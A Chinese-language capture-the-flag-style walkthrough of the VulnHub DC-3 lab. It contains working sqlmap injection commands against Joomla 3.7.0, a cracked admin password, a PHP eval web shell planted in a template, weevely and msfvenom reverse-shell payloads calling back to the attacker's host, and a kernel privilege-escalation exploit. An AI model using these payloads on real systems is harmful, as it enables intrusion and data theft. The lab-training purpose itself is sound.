因为中途靶机电脑关了所以靶机ip变了

Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权

搭建测试靶机

下载地址:DC: 3.2 ~ VulnHub
则靶机DC-3 ip:192.168.1.106(NAT连接)
攻击机kali linux ip:192.168.1.237

信息收集

使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机

对目标靶机进行端口扫描

利用nmap对目标主机进行端口扫描,发现开放端口:80

使用命令:nmap -A -p- -T4 192.168.1.106

我们发现nmap扫描出此站点是由joomla搭建而成的 

目录扫描

dirb http://192.168.1.106

访问:http://192.168.1.106/administrator/发现是一个后台登陆页面

知道网站用的是joomla cms,那我们就可以使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等:
命令:joomscan --url http://192.168.1.106

发现 joomla 的版本为  3.7.0

这里若不适用nmap扫描也可以直接搜索joomla 3.7.0出现的漏洞:

searchsploit joomla 3.7.0

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

漏洞利用

使用sqlmap

爆表库
sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 爆表
sqlmap -u "http://192.168.6.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb --tables

找到了名为# __users表,其中保存了用户名和密码信息;

 爆列

 sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --columns -T '#__users' -D joomladb  --batch 

爆字段

sqlmap -u "http://192.168.1.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --dump 'username,password' -T '#__users' -D joomladb

 用户名:admin
密码:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

利用johnny暴力破解,得到了明文密码为snoopy

进行提权

进入网站后台管理主页面(http://192.168.6.138/administrator/index.php),具体操作如下:
点击页面右侧的“ Templates ” ——> 再点击“ Templates ” ——> 点击“ Beez3 Details and Files ” ——> 点击“ index.php ”,进入网页源码。
其中登录后台管理的用户名和密码如下:
用户名:admin
密码:snoopy

登录之后找到这个页面

 —》

 在index.php中添加一句话木马并  save保存

<?php @eval($_POST['qwe']);?>

这样我们就可以用蚁剑进行连接

获得了一个非登录非交互式shell,权限为www-data
所以我们需要提升其为交互式shell
思路为:生成一个反弹木马——插入网站文件中(上述index.php中)——拿shell

生成一个后门木马:

weevely generate 123 shell.php

cat shell.php 查看生成的木马,并复制到index.php当中并保存

 

没有发现具有suid权限目录
但find发现sudo具有suid权限,遗憾的是无法使用:
 

ls -al //看有没有suid权限,若具有suid权限,文件权限应为 drwsr,此处没有

find / -perm -4000 //查看具有suid权限的文件


 看看有没有内核漏洞吧,查看系统信息:

uname -a
lsb_release -a

搜索Ubuntu 16.04具有的漏洞(kali下):

searchsploit Ubuntu 16.04

 cat ./usr/share/exploitdb/exploits/linux/local/39772.txt

可以看出下载这个

将下载好的包用蚁剑上传exploit.tar这个包到/tmp目录下

并解压 tar -xvf exploit.tar

 cd ebpf_mapfd_doubleput_exploit/

 ./compile.sh

./doubleput

如果提权就直接拿下!不行就换一中shell环境

 其他shell环境

使用msf建立反弹shell

执行:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 > msfshell.php

这里的ip为kali     ip

生成php的反弹shell:这里我ip写错了打开文件改了一下

将shell上传到DC-3主机中,然后使用msfconsole连接。

依次执行:

use exploit/multi/handler
set PAYLOAD /php/meterpreter/reverse_tcp
set LHOST 192.168.1.37
set PORT 4444
run
 

然后浏览器访问http://192.168.1.31/templates/beez3/msfshell.php 

 shell

python -c 'import pty; pty.spawn("/bin/bash")'

到之前解压的文件路径下按之前的运行:

./doubleput

就提权了 

Logo

更多推荐